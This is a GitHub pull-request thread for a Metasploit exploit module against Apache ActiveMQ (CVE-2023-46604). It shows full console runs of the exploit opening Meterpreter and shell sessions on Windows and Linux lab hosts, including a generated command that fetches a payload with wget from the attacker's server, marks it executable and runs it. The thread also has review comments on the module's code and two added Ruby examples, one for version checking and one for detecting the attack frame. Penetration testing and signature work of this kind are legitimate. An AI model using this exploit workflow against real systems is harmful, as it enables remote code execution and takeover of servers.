Exploit module for CVE-2023-46604 - Apache ActiveMQ #18501

Merged: 11 commits, Nov 6, 2023

Conversation

sfewer-r7 (Contributor) commented Nov 1, 2023

This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ. This exploit is based off the original work by X1r0z (https://github.com/X1r0z/ActiveMQ-RCE).

Opening this pull request as a draft while I work on it; the following needs to be done.

  • The session is not being automatically caught as expected, you have to manually interact with the new session
  • Test a Linux target
  • Add documentation

Example usage:

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options

Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[
                                       ,type:host:port][...]
   RHOSTS   192.168.86.50    yes       The target host(s), see https://docs.me
                                       tasploit.com/docs/using-metasploit/basi
                                       cs/using-metasploit.html
   RPORT    61616            yes       The target port (TCP)
   SRVHOST  192.168.86.42    yes       The local host or network interface to
                                       listen on. This must be an address on t
                                       he local machine or 0.0.0.0 to listen o
                                       n all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (defau
                                       lt is randomly generated)
   URIPATH                   no        The URI to use for this exploit (defaul
                                       t is random)


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   EXITFUNC           process          yes       Exit technique (Accepted: '',
                                                  seh, thread, process, none)
   FETCH_COMMAND      CERTUTIL         yes       Command to fetch payload (Acc
                                                 epted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE       false            yes       Attempt to delete the binary
                                                 after execution
   FETCH_FILENAME     HzZSYqDojV       no        Name to use on remote system
                                                 when storing payload; cannot
                                                 contain spaces.
   FETCH_SRVHOST                       no        Local IP to use for serving p
                                                 ayload
   FETCH_SRVPORT      8080             yes       Local port to use for serving
                                                  payload
   FETCH_URIPATH                       no        Local URI to use for serving
                                                 payload
   FETCH_WRITABLE_DI  %TEMP%           yes       Remote writable dir to store
   R                                             payload; cannot contain space
                                                 s.
   LHOST              eth0             yes       The listen address (an interf
                                                 ace may be specified)
   LPORT              4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > check
[*] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > 
[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.50:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
[*] 192.168.86.50:61616 - Using URL: http://192.168.86.42:8080/33Y94vb
[*] 192.168.86.50    apache_activemq_rce_cve_2023_46604 - 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.50    apache_activemq_rce_cve_2023_46604 - 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:51699) at 2023-11-01 17:32:06 +0000

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\apache-activemq-5.15.3\bin
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.86.50 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > 

@sfewer-r7 sfewer-r7 changed the title Add initial work on exploit module for CVE-2023-46604 Exploit module for CVE-2023-46604 - Apache ActiveMQ Nov 1, 2023
sfewer-r7 (Contributor, Author)

This pull request is now ready for review. I added Windows, Linux and Unix (for OSX, although I don't have an OSX machine to test on) targets, as ActiveMQ supports all of these.

Windows

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.50:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.50:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.15.3
[*] 192.168.86.50:61616 - Using URL: http://192.168.86.42:8080/4ORmILKzvCrowHQ
[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.50:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.50:51975) at 2023-11-02 10:15:14 +0000

meterpreter > getuid
Server username: WIN-V28QNSO2H05\Administrator
meterpreter > pwd
C:\apache-activemq-5.15.3\bin
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 

Linux

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/Fn51CApi
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Sending stage (3045380 bytes) to 192.168.86.43
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.43:44674) at 2023-11-02 10:17:42 +0000

meterpreter > getuid
Server username: steve
meterpreter > pwd
/home/steve/Downloads/apache-activemq-5.18.2/bin
meterpreter > sysinfo
Computer     : 192.168.86.43
OS           : Ubuntu 22.04 (Linux 6.2.0-33-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Unix

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] 192.168.86.43:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.86.43:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
[*] 192.168.86.43:61616 - Using URL: http://192.168.86.42:8080/3mzi3Tfryin
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 192.168.86.43:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.43:48962) at 2023-11-02 10:20:13 +0000
id
[*] 192.168.86.43:61616 - Server stopped.

uid=1000(steve) gid=1000(steve) groups=1000(steve),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),139(wireshark)
pwd
/home/steve/Downloads/apache-activemq-5.18.2/bin
uname -a
Linux sfewer-ubuntu-test 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
exit

@sfewer-r7 sfewer-r7 marked this pull request as ready for review November 2, 2023 10:32
@bwatters-r7 bwatters-r7 self-assigned this Nov 2, 2023
Review comment (Contributor) on:

def check
  connect

  res = sock.get_once

Not a blocker

Suggested change, replacing the line res = sock.get_once with:

begin
  res = sock.get_once
ensure
  disconnect if sock
end


Review comment (Contributor) on:

return CheckCode::Unknown unless res

len, _, magic = res.unpack('NCZ*')

Not a blocker - and definitely not required; a bunch of our other modules use bindata for binary parsing for readability purposes:

https://github.com/dmendel/bindata#what-is-bindata


Review comment (Contributor) on:

sock.puts([data.length].pack('N') + data)

retry_until_truthy(timeout: datastore['WfsDelay']) do

Not a blocker for this PR; there might be an edge case/bug in framework itself if this is required

Review comment (Contributor) on:

  ['0.0.0', '5.15.15']
]

ranges.each do |min, max|

Not a blocker; potentially a missing feature in framework itself

bwatters-r7 (Contributor)

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > show options

Module options (exploit/multi/misc/apache_activemq_rce_cve_2023_46604):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    61616            yes       The target port (TCP)
   SRVHOST  10.5.135.201     yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      OgktwSulD        no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       10.5.135.201     no        Local IP to use for serving payload
   FETCH_SRVPORT       8000             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/apache_activemq_rce_cve_2023_46604) > run

[*] Command to run on remote host: wget -qO ./NEsjPiUoem http://10.5.135.201:8000/RByzlSnTzclKDpvXskXIrg; chmod +x ./NEsjPiUoem; ./NEsjPiUoem &
[*] Fetch Handler listening on 10.5.135.201:8000
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.134.129:61616 - Running automatic check ("set AutoCheck false" to disable)
[+] 10.5.134.129:61616 - The target appears to be vulnerable. Apache ActiveMQ 5.18.2
[*] 10.5.134.129:61616 - Using URL: http://10.5.135.201:8080/y86DDB6crs1tJ9I
[*] 10.5.134.129:61616 - Sleeping for 2 seconds before attempting again
[*] 10.5.134.129:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] 10.5.134.129:61616 - Sent ClassPathXmlApplicationContext configuration file.
[*] Client 10.5.134.129 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:52810) at 2023-11-02 11:37:10 -0500
[*] 10.5.134.129:61616 - Server stopped.

meterpreter > sysinfo
Computer     : 10.5.134.129
OS           : Ubuntu 22.04 (Linux 6.2.0-36-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > 


Review comment (Contributor) on:

return CheckCode::Unknown unless magic == 'ActiveMQ'

if res =~ /ProviderVersion...(\d+\.\d+\.\d+)/

Suggested change, replacing the line if res =~ /ProviderVersion...(\d+\.\d+\.\d+)/ with:

if res !~ /ProviderVersion...(\d+\.\d+\.\d+)/
  CheckCode::Detected
end

Something like this would allow to reduce the level of nested indentation in this function.

sfewer-r7 (Contributor, Author):

Implemented something similar via ea21036 to reduce the nesting.
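The check method discussed in this thread reads the broker's OpenWire WireFormatInfo greeting (4-byte length, command type byte, the magic "ActiveMQ", then marshalled properties that include ProviderVersion) and compares the version against affected ranges. The following is an added, stand-alone Ruby example written for this page, not the module's own code, that does the same parsing for inventory purposes. The constructed frame only mimics the on-the-wire layout; the first affected range is the one quoted in the thread, and the other three are an assumption derived from the fixed releases named in the Apache advisory (5.15.16, 5.16.7, 5.17.6, 5.18.3).

```ruby
# Added example, not the module's own code: parse an OpenWire WireFormatInfo
# frame and classify the advertised ProviderVersion against affected ranges.
require 'rubygems'

MAGIC = 'ActiveMQ'.b
WIRE_FORMAT_INFO = 1 # command type byte of the greeting frame

# Affected ranges, inclusive. The first is the range quoted in the review
# thread; the others are an assumption derived from the fixed releases named
# in the Apache advisory (5.15.16, 5.16.7, 5.17.6, 5.18.3).
AFFECTED_RANGES = [
  ['0.0.0',  '5.15.15'],
  ['5.16.0', '5.16.6'],
  ['5.17.0', '5.17.5'],
  ['5.18.0', '5.18.2']
].freeze

# Constructed test frame that mimics the wire layout: 4-byte length, 1-byte
# command type, 8-byte magic, 4-byte OpenWire version, then a properties blob
# (present flag, size, bytes) in which ProviderVersion is a typed UTF string
# (type byte, 2-byte length, bytes). Those three bytes are what the module's
# regex /ProviderVersion...(\d+\.\d+\.\d+)/ skips with its three dots.
def build_wire_format_info(provider_version, openwire_version: 12)
  props = if provider_version
            key = 'ProviderVersion'
            [1].pack('N') + [key.bytesize].pack('n') + key +
              [9].pack('C') + [provider_version.bytesize].pack('n') + provider_version
          else
            [0].pack('N') # empty property map: ActiveMQ, but no version advertised
          end
  body = [WIRE_FORMAT_INFO].pack('C') + MAGIC + [openwire_version].pack('N')
  body << [1].pack('C') << [props.bytesize].pack('N') << props
  [body.bytesize].pack('N') + body
end

# Returns nil for anything that is not a complete WireFormatInfo frame.
# A real client reads the 4-byte length first, then exactly that many bytes.
def parse_wire_format_info(frame)
  return nil if frame.nil? || frame.bytesize < 17
  len, type, magic = frame.unpack('NCa8') # a8 instead of Z* so the magic is not cut at a NUL
  return nil unless type == WIRE_FORMAT_INFO && magic == MAGIC
  return nil unless len == frame.bytesize - 4
  # /m lets '.' also match a 0x0a byte, so a version string whose length
  # byte happens to be 0x0a does not slip past the regex.
  m = frame.match(/ProviderVersion...(\d+\.\d+\.\d+)/mn)
  { openwire_version: frame[13, 4].unpack1('N'), provider_version: m && m[1] }
end

def affected?(version)
  v = Gem::Version.new(version)
  AFFECTED_RANGES.any? do |min, max|
    v >= Gem::Version.new(min) && v <= Gem::Version.new(max)
  end
end

# Mirrors the module's CheckCode outcomes as symbols.
def classify(frame)
  info = parse_wire_format_info(frame)
  return :unknown unless info                      # not an OpenWire greeting
  return :detected unless info[:provider_version]  # ActiveMQ, version not advertised
  affected?(info[:provider_version]) ? :appears : :safe
end

if $PROGRAM_NAME == __FILE__
  %w[5.15.3 5.15.16 5.18.2 5.18.3].each do |v|
    puts "#{v}: #{classify(build_wire_format_info(v))}"
  end
end
```

Two details differ from the module on purpose: the magic is unpacked with a8 rather than Z*, because Z* only works while the byte after the magic (the high byte of the OpenWire version) is zero, and the regex carries the /m flag so that a 0x0a length byte cannot break the version extraction.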

Review comment (Contributor) on:

end

def on_request_uri(cli, request)
  if request.uri == get_resource

Suggested change, replacing the line if request.uri == get_resource with:

if request.uri != get_resource
  super
end

Again here, to reduce nested indentation :)

sfewer-r7 (Contributor, Author):

Reduced indentation as suggested in 4272678.

Review comment from jvoisin (Contributor), Nov 2, 2023, on:

<list>
  <value>#{shell}</value>
  <value>#{flag}</value>
  <value><![CDATA[#{payload.encoded}]]></value>

This might be a stupid question, but could it be possible for the payload to contain the characters ]]>?

sfewer-r7 (Contributor, Author):

Good question, CDATA cannot contain the sequence ]]>; this was not an issue when testing any payloads. I guess the safest thing to do would be to sanity check that payload.encoded does not include ]]>, and if it does, fail gracefully.

sfewer-r7 (Contributor, Author):

I added a check for this in fa8c400.

HuskyHacks (Contributor) commented Nov 3, 2023

@sfewer-r7 quick question for you about this

Is there ever a case where we could get the server to load the remote XML file via HTTPS instead of HTTP?

I'm working on network signatures for this one and the XML in the body of the HTTP request would be a phenomenal signature... if we can always see it 😅

sfewer-r7 (Contributor, Author)

Hi @HuskyHacks, good question. For this specific Metasploit module I don't think it would work, as setting the SSL option will make both the initial TCP connection to port 61616 try to use SSL as well as the HttpServer which is separately serving out the XML file. The reason for this is that both these mixins query the same option (SSL) to determine whether they should establish SSL-based connections. This is a quirk of using both the Msf::Exploit::Remote::Tcp and Msf::Exploit::Remote::HttpServer mixins in the same module (happy to be corrected here, cc @bwatters-r7 or @adfoster-r7).

That aside, if the XML file was served over HTTPS, the client (ActiveMQ) would need to accept a self-signed cert from the attacker (unless the attacker supplies a CA-signed cert), so depending on whether the client's network stack verifies certs, serving the XML file over HTTPS may or may not work. I have not tested this.

Sorry I can't give you a more concrete answer :)

HuskyHacks (Contributor)

@sfewer-r7 thank you! That helps a lot. I'm now testing to see if I can coerce that XML load to use HTTPS with the original POC.

Thanks!
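The signature question above has a second angle besides the HTTP body: the OpenWire frame sent to port 61616 carries the ClassPathXmlApplicationContext class name together with the URL of the XML file (the "Sent ClassPathXmlApplicationContext configuration file" step in the runs above), and in those runs that frame travels over plain TCP. A sensor keyed on that frame sees the URL whether the XML is later fetched over http or https. The following is an added Ruby example written for this page, not part of the module or of anyone's comment here, that scans constructed sample frames for that combination and extracts the referenced URL; the frame layout, the command type bytes and the 198.51.100.7 addresses are constructed for the example and are not captures.

```ruby
# Added example, not the module's own code: a passive detector for OpenWire
# frames that reference ClassPathXmlApplicationContext together with a URL.
CONTEXT_CLASS = 'org.springframework.context.support.ClassPathXmlApplicationContext'.b

# Length-prefixed frame and 2-byte-length UTF string, as OpenWire writes them.
def frame(body)
  [body.bytesize].pack('N') + body
end

def utf(str)
  [str.bytesize].pack('n') + str.b
end

# Inspect one frame. Returns nil when it carries no class-name/URL pair,
# otherwise a hash a sensor can turn into an alert (type byte, class, URL).
def inspect_frame(raw)
  return nil if raw.bytesize < 5
  len = raw.unpack1('N')
  return nil unless len == raw.bytesize - 4 # truncated, or not a length-prefixed frame
  body = raw.byteslice(4, len)
  idx = body.index(CONTEXT_CLASS)
  return nil unless idx
  rest = body.byteslice(idx + CONTEXT_CLASS.bytesize, body.bytesize)
  m = rest.match(%r{(https?://[\x21-\x7e]+)}n) # printable run after the class name
  { command_type: body.getbyte(0), class_name: CONTEXT_CLASS, url: m && m[1] }
end

# Run the check over a list of frames and keep only the hits.
def scan(frames)
  frames.map { |f| inspect_frame(f) }.compact
end

# Constructed samples (not captures). The command type bytes are placeholders.
SAMPLE_FRAMES = [
  # benign greeting-style frame: type byte, magic, version
  frame([1].pack('C') + 'ActiveMQ'.b + [12].pack('N')),
  # benign text that mentions a URL but no class name
  frame([24].pack('C') + utf('see http://198.51.100.7/docs for details')),
  # class name followed by an http URL
  frame([31].pack('C') + "\x01".b + utf(CONTEXT_CLASS) + "\x01".b +
        utf('http://198.51.100.7:8080/poc.xml')),
  # same shape with an https URL: the frame-level signature still fires
  frame([31].pack('C') + "\x01".b + utf(CONTEXT_CLASS) + "\x01".b +
        utf('https://198.51.100.7:8443/poc.xml'))
].freeze

if $PROGRAM_NAME == __FILE__
  scan(SAMPLE_FRAMES).each do |hit|
    puts "alert: type=#{hit[:command_type]} class=#{hit[:class_name]} url=#{hit[:url]}"
  end
end
```

A real sensor has to reassemble the TCP stream and split it on the 4-byte length prefix before calling inspect_frame, since the class name can straddle segment boundaries; and the check only applies where the broker's transport is plain tcp, because an ssl:// transport hides the frame unless the sensor terminates or inspects TLS.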

bwatters-r7 (Contributor) commented Nov 3, 2023

I have no idea if there's something else in the stack of dependencies that would affect the SSL status, and this is based off of about 5 minutes of code spelunking, but Msf::Exploit::Remote::Tcp uses an advanced option for SSL:

OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]),

Msf::Exploit::Remote::HttpServer uses a standard SSL option it inherits from TcpServer:

OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]),

So at least there, it should not conflict?
Edit..... ugh, they both go into the datastore under the same name..... so yeah, you're right.

sfewer-r7 (Contributor, Author)

Thanks Brendan, appreciate you investigating. I don't think this blocks this module, but it would be nice to have some way to "deregister" the TCP mixin from SSL in this specific instance, as the OpenWire protocol doesn't require it (AFAIK), and this would open up enabling SSL separately for the HttpServer.

sfewer-r7 (Contributor, Author)

Thanks for everyone's review/feedback. I have made all the edits I plan to, unless there are any outstanding issues we want to address.

@bwatters-r7 bwatters-r7 merged commit e8d45b0 into rapid7:master Nov 6, 2023
32 checks passed
bwatters-r7 (Contributor)

Release Notes

This pull request is an exploit module for CVE-2023-46604, affecting the OpenWire transport unmarshaller in Apache ActiveMQ.

@bwatters-r7 bwatters-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Nov 6, 2023
HuskyHacks (Contributor) commented Nov 15, 2023

An interesting development here! Don't know if it's worth refactoring the current module, but wanted to post here if anyone is interested in exploitation.

https://vulncheck.com/blog/cve-2023-44604-activemq-in-memory

Turns out you don't need to shell out to execute code if you use the Nashorn engine to evaluate and execute code directly from within the process space of java.

@sfewer-r7 sfewer-r7 deleted the CVE-2023-46604 branch July 4, 2024 08:59